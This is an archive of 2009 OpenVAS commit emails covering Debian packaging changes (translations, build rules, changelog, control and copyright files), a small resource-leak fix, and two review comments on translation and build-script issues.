+"executando nessus-update-plugins). Você atualmente tem ${countnewplugs} " +"plugin(s) que não são fornecidos por este pacote." + +#. Type: boolean +#. 
Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Isto irá se aplicar a todas as suas novas instalações/atualizações " +"deste pacote até que você o reconfigure. Você deve dizer 'Não' se você " +"planeja usar o nessus-update-plugins no futuro." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Entretanto, se você baixou plugins para uma antiga versão maior do Nessus " +#~ "(e.g. da 1.x) eles podem não funcionar corretamente com versões mais " +#~ "novas do Nessus então, às vezes, é aconselhável removê-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,77 @@ +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# Developers do not need to manually edit POT or PO files. +# , fuzzy +# +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.5-3\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-09-28 19:06-0700\n" +"Last-Translator: Daniel Nylander \n" +"Language-Team: Swedish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=iso-8859-1\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Radera okända Nessus plugins?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Mappen /var/lib/nessus/plugins inkluderar ett antal okända plugins. Det är " +"antagligen för att du laddade ner ytterligare plugins (som att köra nessus-" +"update-plugins kommandot). 
Du har för närvarande ${countnewplugs} plugins " +"som inte är inkluderat i detta paket." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Notera: Detta gäller för alla dina nya installationer/uppgraderingar av " +"detta paket (tills du konfigurerar om det). Du borde säga 'Nej' om du " +"planerar att använda nessus-update-plugins i framtiden." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Om du laddar ner plugins anpassade för en äldre version av Nessus (till " +#~ "exempel 1.x) kommer de antagligen inte att fungera bra med nyare " +#~ "versioner av Nessus. Därför är det ibland rekommenderat att radera dom." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,42 @@ +# SOME DESCRIPTIVE TITLE. +# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER +# This file is distributed under the same license as the PACKAGE package. +# FIRST AUTHOR , YEAR. +# +#, fuzzy +msgid "" +msgstr "" +"Project-Id-Version: PACKAGE VERSION\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" +"Last-Translator: FULL NAME \n" +"Language-Team: LANGUAGE \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=CHARSET\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "Remove unknown OpenVAS plugins?" +msgstr "" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,71 @@ +# Vietnamese translation for nessus-plugins. +# Copyright © 2005 Free Software Foundation, Inc. +# Clytie Siddall , 2005. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.4-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-06-26 15:35+0930\n" +"Last-Translator: Clytie Siddall \n" +"Language-Team: Vietnamese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=utf-8\n" +"Content-Transfer-Encoding: 8bit\n" +"Plural-Forms: nplurals=1; plural=0\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Loại bá» các bá»™ cầm phít Nessus lạ không?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Thư mục «/var/lib/nessus/plugins» gồm má»™t số bá»™ cầm phít lạ, rất có thể vì " +"bạn đã tải má»™t số bá»™ cầm phít thêm vào nó (v.d. bằng cách chạy lệnh «nessus-" +"update-plugins»). Hiện thá»i bạn có ${countnewplugs} bá»™ cầm phít mà gói tin " +"này không cung cấp." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. 
You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Ghi chú: tùy chá»n này sẽ áp dụng vào má»i việc cài đặt/cập nhật gói tin này, " +"cho đến khi bạn cấu hình lại nó. Vì vậy bạn nên nói «Không» nếu bạn định sá»­ " +"dụng lệnh «nessus-update-plugins» trong tương lai." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Tuy nhiên, nếu bạn đã tải vá» má»™t số bá»™ cầm phít cho má»™t phiên bản lá»›n " +#~ "Nessus cÅ© hÆ¡n (v.d. từ phiên bản 1.x) thì chúng có lẽ không hoạt động cho " +#~ "đúng vá»›i phiên bản Nessus má»›i hÆ¡n. Như thế thì, đôi khi bạn nên loại bá» " +#~ "những bá»™ cÅ©." Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:38:55 UTC (rev 5408) @@ -2,7 +2,7 @@ # Derived from dh_make example. #export DH_VERBOSE=1 -#export DH_COMPAT=5 +#export DH_COMPAT=4 include /usr/share/dpatch/dpatch.make @@ -19,6 +19,7 @@ build-stamp: config.status dh_testdir $(MAKE) + ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch 
@@ -32,15 +33,19 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean + -rm -rf audit/exclude-list dh_clean build-stamp - [ ! -f libtool ] || rm -f libtool - [ ! -d bin/ ] || rm -rf bin/ install: build-stamp dh_testdir dh_testroot dh_clean -k - $(MAKE) install-minimal prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib +# Before we install we audit the plugins available +# If the audit passes we continue + $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib + ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) + ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) + rm -rf $(tmp)/var/run binary-indep: # Nothing to do, no arch-indep packages here. @@ -49,8 +54,10 @@ dh_testdir dh_testroot dh_installdebconf - dh_installdocs - dh_installchangelogs + dh_installdocs docs/plugins_api.txt + dh_installexamples extra/update-openvas-plugins \ + extra/describe-openvas-plugin + dh_installchangelogs ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ @@ -58,6 +65,7 @@ endif dh_compress dh_fixperms + chmod -x $(tmp)/var/lib/openvas/plugins/*.nes dh_installdeb dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ $(tmp)/var/lib/openvas/plugins/*.nes From scm-commit at wald.intevation.org Wed Oct 7 00:39:53 2009 
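Review bot: in the new de.po, fr.po, ja.po, nl.po, pt.po, pt_BR.po, sv.po and vi.po of r5408 (and in the tail of da.po), every msgstr still names Nessus, /var/lib/nessus/plugins and nessus-update-plugins while the msgid now refers to OpenVAS and /var/lib/openvas/plugins. The entries are flagged "#, fuzzy", so they are still waiting for a translator. This prompt asks the administrator whether files should be deleted, so a translation that names the wrong directory should not be unfuzzied as it stands; es.po is the only catalogue in this commit whose msgstr already matches the new msgid. Separately, the pt_BR.po header block contains a bare "pt_BR utf-8\n" line that is not a "Name: value" field; drop it or turn it into a proper header entry.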
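Review bot: in the install target of debian/rules (r5408, hunk @@ -32,15 +33,19 @@), the plugin-removal subshell joins "cd $(tmp)/var/lib/openvas/plugins" to the "cat ... | xargs rm -f" pipeline with ";", so if the cd fails, rm -f is applied to the listed names in whatever directory the recipe was started from. Use "&&" there, as the next line "( cd audit && sh audit-plugins ... )" already does. The added comment also says "Before we install we audit the plugins available", but the recipe runs "$(MAKE) install" and the removal first and audit-plugins last, against the already installed tree; either reorder the steps or reword the comment to say the audit checks the staged result.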
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:39:53 +0200 (CEST) Subject: [Openvas-commits] r5409 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006223953.44791861EAAA@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:39:52 +0200 (Wed, 07 Oct 2009) New Revision: 5409 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog Log: Update to the 1.0.5-1 package contents Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:38:55 UTC (rev 5408) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:39:52 UTC (rev 5409) @@ -1,3 +1,9 @@ +openvas-plugins (1.0.5-1) unstable; urgency=low + + * New upstream release. + + -- Javier Fernandez-Sanguino Pen~a Fri, 02 Jan 2009 01:41:25 +0100 + openvas-plugins (1.0.2-1) unstable; urgency=low * New upstream release. From scm-commit at wald.intevation.org Wed Oct 7 00:43:45 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:43:45 +0200 (CEST) Subject: [Openvas-commits] r5410 - trunk/winslad Message-ID: <20091006224345.698D8861EAAC@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:43:44 +0200 (Wed, 07 Oct 2009) New Revision: 5410 Modified: trunk/winslad/ChangeLog trunk/winslad/xml.cpp Log: Fixed resource leak Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2009-10-06 22:39:52 UTC (rev 5409) +++ trunk/winslad/ChangeLog 2009-10-06 22:43:44 UTC (rev 5410) 
@@ -1,3 +1,7 @@ +2009-10-06 Tim Brown + + * xml.cpp: Fixed resource leak. + 2009-04-16 Felix Wolfsteller * ChangeLog, Makefile: Donated new lines at end of files. Modified: trunk/winslad/xml.cpp =================================================================== --- trunk/winslad/xml.cpp 2009-10-06 22:39:52 UTC (rev 5409) +++ trunk/winslad/xml.cpp 2009-10-06 22:43:44 UTC (rev 5410) @@ -390,6 +390,7 @@ if (!parser) { PRINTF("could not create XML parser\r\n"); + fclose(file); return -1; } From scm-commit at wald.intevation.org Wed Oct 7 00:46:52 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:46:52 +0200 (CEST) Subject: [Openvas-commits] r5411 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . patches Message-ID: <20091006224652.03B14861EAB2@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:46:52 +0200 (Wed, 07 Oct 2009) New Revision: 5411 Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: First packaging of the openvas-plugins-dfsg package by Joey Hess. Removes the audit/ subdir as it is not used anymore, contents of the packages are restricted to DFSG-free plugins as shown in the copyright. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:46:52 UTC (rev 5411) 
@@ -1,9 +1,29 @@ -openvas-plugins (1.0.5-1) unstable; urgency=low +openvas-plugins-dfsg (1.0.5-0.1) unstable; urgency=low - * New upstream release. + * New upstream release + * Stripped off all potentially non-free components - -- Javier Fernandez-Sanguino Pen~a Fri, 02 Jan 2009 01:41:25 +0100 + -- Joey Schulze Sat, 17 Jan 2009 20:54:39 +0100 +openvas-plugins (1.0.4-1) unstable; urgency=low + + * New upstream release + . Scripts with license CC-BY-SA 2.0 have been replaced by GPLv2+-licensed ones + * Remove exclude-script script which is not needed anymore + * Set Debian OpenVAS Maintainers as maintainer + * Add Javier Fernandez-Sanguino Pen~a, Jan Wagner, Tim Brown and me to + Uploaders + * Bump Standards-Version + * Add links to upstream version control system + * Set section to net + * Adjust license of NASL scripts to GPL since they come from the GPLv2 + feed [04_free_plugins.dpatch] + * Removed audit-plugins call since all NASL scripts are considered to be + licensed under the GPLv2 + * Removed debian/audit directory which is not needed anymore + + -- Joey Schulze Fri, 28 Nov 2008 11:36:34 +0100 + openvas-plugins (1.0.2-1) unstable; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:46:52 UTC (rev 5411) 
@@ -1,13 +1,18 @@ -Source: openvas-plugins +Source: openvas-plugins-dfsg Section: admin Priority: optional -Maintainer: Javier Fernandez-Sanguino Pen~a +Maintainer: Debian OpenVAS Maintainers +Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev -Standards-Version: 3.7.2 +Standards-Version: 3.8.0 +Vcs-Browser: http://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-plugins/packaging/debian/?root=openvas +Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins/packaging/debian/ Homepage: http://www.openvas.org -Package: openvas-plugins +Package: openvas-plugins-dfsg +Section: net Architecture: any +Provides: openvas-plugins Depends: ${shlibs:Depends}, debconf | debconf-2.0 Recommends: wget, openvas-server (>= 1.0), nmap, snmp Description: OpenVAS vulnerability tests Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:43:44 UTC (rev 5410) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:46:52 UTC (rev 5411) @@ -5,12 +5,7 @@ This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. [ For specific (c) statements see the individual files. ] -[ NOTE: The LICENSE.txt file distributed in the source package describes - Tenable's License which does not apply to the GPL Nessus plugins ] -The binary code of this package is distributed under the -GNU General Public License v2. - This package also provides the update-nessus-plugins and describe-nessus-plugin scripts (provided in the examples directory). These are copyright (c) 2003, George A. Theall 
@@ -22,14 +17,125 @@ These scripts are free software; you can redistribute it and/or modify it under the same terms as Perl itself. +Files in this package come from many different authors: + + A. Tarasco research. + Adam Baldwin + Alexis de Bernis + Anthony R. Plastino III + Astharot + Audun Larsen + Axel Nennker + Bekrar Chaouki + Brian Smith-Sweeney + Chandan S + Chaouki BEKRAR + Charles Thier + Chris Sullo + Christoff Breytenbach + David Kyger + Davy Van De Moere + Douglas Minderhout + Eli Kara + Erik Anderson + Erik Stephens + Erik Tayler + Farhad Koosha + Felix Huber + Ferdy Riphagen + Filipe Custodio + Forrest Rae + Frank Berger + Geoff Humes + Geoffroy Raimbault + George A. Theall + Georges Dagousset + Giovanni Fiaschi + Gregory Duchemin + H D Moore + Haroon Meer + Hendrik Scholz + Holger Heimann + Holm Diening + Immo Goltz + Intranode + James W. Abendschan + Jan-Oliver Wagner + Jasmin Amidzic . + Jason Haar + Jason Lidow + Javier Fernandez-Sanguino Peña + Javier Munoz Mellid + Javier Olascoaga + Jeff Adams + John Lampe + Jon Passki + Joseph Mlodzianowski + Josh Zlatin-Amishav + Julio César Hernández + Justin Seitz + Jøséph Mlødzianøwski + K-Otik.com + Keith Young + Laurent Facq <@u-bordeaux.fr> + Laurent Kitzinger + Lionel Cons , CERN + Lukas Grunwald + Mathieu Meadele + Mathieu Perrin + Matt Moore + Matthew North < matthewnorth at yahoo.com > + Michael J. Richardson + Michel Arboi + Nicolas Gregoire + Noam Rathaus , Beyond Security Ltd. + Orlando Padilla + Pasi Eronen + Patrik Karlsson + Paul Ewing + Paul Johnston + Pavel Kankovsky + Pedro Antonio Nieto Feijoo + Prizm + Randy Matz + Renaud Deraison + Rick McCloskey + Roelof Temmingh + Rui Bernardino + Scott Adkins + Scott Shebby scotts at scanalert.com + Sebastian Andersson + Stefaan Van Dooren + Sullo + Sverre H. 
Huseby + Tarik El-Yassem + Thomas Reinke + Tim Brown + Tobias Glemser + Tom Ferris + Tomi Hanninen + Veerendra GG + Victor Kirhenshtein + Vincent Renardias + Vlatko Kosturjak + Xue Yong Zhi + Yoav Goldberg + Zorgon + altomo at digitalgangsters.net + chewkeong at security.org.sg + deepquest + fr0stman + tony at libpcap.net + visigoth + + -------------------------------------------------------------------------- - Plugins + NASL Scripts -------------------------------------------------------------------------- -All of the C and NASL scripts included in this release (unless noted +All NASL scripts included in this release (unless noted otherwise in the plugin itself, see below) are distributed -under the "Nessus Script License" which is equivalent to the -GNU General Public License version 2: +under the GNU General Public License version 2: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by @@ -54,8 +160,8 @@ Debian advisories ----------------- -Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. -for more information see http://www.debian.org/licens +Debian advisories are (c) 1997-2006 Software in the Public Interest, Inc. +for more information see http://www.debian.org/license This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, Draft v1.0 or later 
@@ -179,302 +285,3 @@ derivative of the work in any standard (paper) book form is prohibited unless prior permission is obtained from the copyright holder.' to the license reference or copy. - -Gentoo advisories ------------------ - -Gentoo Advisories are (c) 2001-2005 Gentoo Foundation, Inc. - -The messages of Gentoo advisories are release under the -Creative Commons - Attribution / Share Alike license. - - You are free: - * to copy, distribute, display, and perform the work - * to make derivative works - * to make commercial use of the work - - Under the following conditions: - - by - Attribution. You must give the original author credit. - Share Alike. If you alter, transform, or build upon this work, you may - distribute the resulting work only under a license identical to this - one. - * For any reuse or distribution, you must make clear to others the - license terms of this work. - * Any of these conditions can be waived if you get permission from - the copyright holder. - Your fair use and other rights are in no way affected by the above. - -For more information see http://creativecommons.org/licenses/by-sa/2.0/ - -Full license: - - Creative Commons - - Creative Commons Legal Code - - Attribution-ShareAlike 2.0 - CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE - LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN - ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS - INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES - REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR - DAMAGES RESULTING FROM ITS USE. - - License - - THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS - CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS - PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE - WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS - PROHIBITED. 
- - BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND - AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS - YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF - SUCH TERMS AND CONDITIONS. - - 1. Definitions - a. "Collective Work" means a work, such as a periodical issue, - anthology or encyclopedia, in which the Work in its entirety in - unmodified form, along with a number of other contributions, - constituting separate and independent works in themselves, are - assembled into a collective whole. A work that constitutes a - Collective Work will not be considered a Derivative Work (as - defined below) for the purposes of this License. - b. "Derivative Work" means a work based upon the Work or upon the - Work and other pre-existing works, such as a translation, musical - arrangement, dramatization, fictionalization, motion picture - version, sound recording, art reproduction, abridgment, - condensation, or any other form in which the Work may be recast, - transformed, or adapted, except that a work that constitutes a - Collective Work will not be considered a Derivative Work for the - purpose of this License. For the avoidance of doubt, where the - Work is a musical composition or sound recording, the - synchronization of the Work in timed-relation with a moving image - ("synching") will be considered a Derivative Work for the purpose - of this License. - c. "Licensor" means the individual or entity that offers the Work - under the terms of this License. - d. "Original Author" means the individual or entity who created the - Work. - e. "Work" means the copyrightable work of authorship offered under - the terms of this License. - f. 
"You" means an individual or entity exercising rights under this - License who has not previously violated the terms of this License - with respect to the Work, or who has received express permission - from the Licensor to exercise rights under this License despite a - previous violation. - g. "License Elements" means the following high-level license - attributes as selected by Licensor and indicated in the title of - this License: Attribution, ShareAlike. - - 2. Fair Use Rights. Nothing in this license is intended to reduce, - limit, or restrict any rights arising from fair use, first sale or - other limitations on the exclusive rights of the copyright owner under - copyright law or other applicable laws. - - 3. License Grant. Subject to the terms and conditions of this License, - Licensor hereby grants You a worldwide, royalty-free, non-exclusive, - perpetual (for the duration of the applicable copyright) license to - exercise the rights in the Work as stated below: - a. to reproduce the Work, to incorporate the Work into one or more - Collective Works, and to reproduce the Work as incorporated in the - Collective Works; - b. to create and reproduce Derivative Works; - c. to distribute copies or phonorecords of, display publicly, perform - publicly, and perform publicly by means of a digital audio - transmission the Work including as incorporated in Collective - Works; - d. to distribute copies or phonorecords of, display publicly, perform - publicly, and perform publicly by means of a digital audio - transmission Derivative Works. - e. For the avoidance of doubt, where the work is a musical - composition: - i. Performance Royalties Under Blanket Licenses. Licensor waives - the exclusive right to collect, whether individually or via a - performance rights society (e.g. ASCAP, BMI, SESAC), - royalties for the public performance or public digital - performance (e.g. webcast) of the Work. - ii. Mechanical Rights and Statutory Royalties. 
Licensor waives - the exclusive right to collect, whether individually or via a - music rights society or designated agent (e.g. Harry Fox - Agency), royalties for any phonorecord You create from the - Work ("cover version") and distribute, subject to the - compulsory license created by 17 USC Section 115 of the US - Copyright Act (or the equivalent in other jurisdictions). - f. Webcasting Rights and Statutory Royalties. For the avoidance of - doubt, where the Work is a sound recording, Licensor waives the - exclusive right to collect, whether individually or via a - performance-rights society (e.g. SoundExchange), royalties for the - public digital performance (e.g. webcast) of the Work, subject to - the compulsory license created by 17 USC Section 114 of the US - Copyright Act (or the equivalent in other jurisdictions). - - The above rights may be exercised in all media and formats whether now - known or hereafter devised. The above rights include the right to make - such modifications as are technically necessary to exercise the rights - in other media and formats. All rights not expressly granted by - Licensor are hereby reserved. - - 4. Restrictions.The license granted in Section 3 above is expressly - made subject to and limited by the following restrictions: - a. You may distribute, publicly display, publicly perform, or - publicly digitally perform the Work only under the terms of this - License, and You must include a copy of, or the Uniform Resource - Identifier for, this License with every copy or phonorecord of the - Work You distribute, publicly display, publicly perform, or - publicly digitally perform. You may not offer or impose any terms - on the Work that alter or restrict the terms of this License or - the recipients' exercise of the rights granted hereunder. You may - not sublicense the Work. You must keep intact all notices that - refer to this License and to the disclaimer of warranties. 
You may - not distribute, publicly display, publicly perform, or publicly - digitally perform the Work with any technological measures that - control access or use of the Work in a manner inconsistent with - the terms of this License Agreement. The above applies to the Work - as incorporated in a Collective Work, but this does not require - the Collective Work apart from the Work itself to be made subject - to the terms of this License. If You create a Collective Work, - upon notice from any Licensor You must, to the extent practicable, - remove from the Collective Work any reference to such Licensor or - the Original Author, as requested. If You create a Derivative - Work, upon notice from any Licensor You must, to the extent - practicable, remove from the Derivative Work any reference to such - Licensor or the Original Author, as requested. - b. You may distribute, publicly display, publicly perform, or - publicly digitally perform a Derivative Work only under the terms - of this License, a later version of this License with the same - License Elements as this License, or a Creative Commons iCommons - license that contains the same License Elements as this License - (e.g. Attribution-ShareAlike 2.0 Japan). You must include a copy - of, or the Uniform Resource Identifier for, this License or other - license specified in the previous sentence with every copy or - phonorecord of each Derivative Work You distribute, publicly - display, publicly perform, or publicly digitally perform. You may - not offer or impose any terms on the Derivative Works that alter - or restrict the terms of this License or the recipients' exercise - of the rights granted hereunder, and You must keep intact all - notices that refer to this License and to the disclaimer of - warranties. 
You may not distribute, publicly display, publicly - perform, or publicly digitally perform the Derivative Work with - any technological measures that control access or use of the Work - in a manner inconsistent with the terms of this License Agreement. - The above applies to the Derivative Work as incorporated in a - Collective Work, but this does not require the Collective Work - apart from the Derivative Work itself to be made subject to the - terms of this License. - c. If you distribute, publicly display, publicly perform, or publicly - digitally perform the Work or any Derivative Works or Collective - Works, You must keep intact all copyright notices for the Work and - give the Original Author credit reasonable to the medium or means - You are utilizing by conveying the name (or pseudonym if - applicable) of the Original Author if supplied; the title of the - Work if supplied; to the extent reasonably practicable, the - Uniform Resource Identifier, if any, that Licensor specifies to be - associated with the Work, unless such URI does not refer to the - copyright notice or licensing information for the Work; and in the - case of a Derivative Work, a credit identifying the use of the - Work in the Derivative Work (e.g., "French translation of the Work - by Original Author," or "Screenplay based on original Work by - Original Author"). Such credit may be implemented in any - reasonable manner; provided, however, that in the case of a - Derivative Work or Collective Work, at a minimum such credit will - appear where any other comparable authorship credit appears and in 